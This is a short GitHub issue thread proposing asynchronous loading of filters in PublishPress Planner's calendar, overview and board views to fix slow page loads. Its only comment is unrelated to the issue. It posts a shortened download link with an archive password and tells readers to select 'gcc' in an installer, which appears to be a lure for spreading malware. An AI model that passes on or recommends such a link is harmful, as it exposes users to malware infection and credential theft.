### ISSUE TITLE
Load Filters on Calendar Asynchronously

### ISSUE THREAD

**Issue by rizaardiyanto1412** [publishpress/PublishPress-Planner#1746]
Some users face a slow loading on calendar view: https://wordpress.org/support/topic/calender-view-very-slow/

Lets load the filter async for Content Calendar, Overview and Board so it doesn't affect page load.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
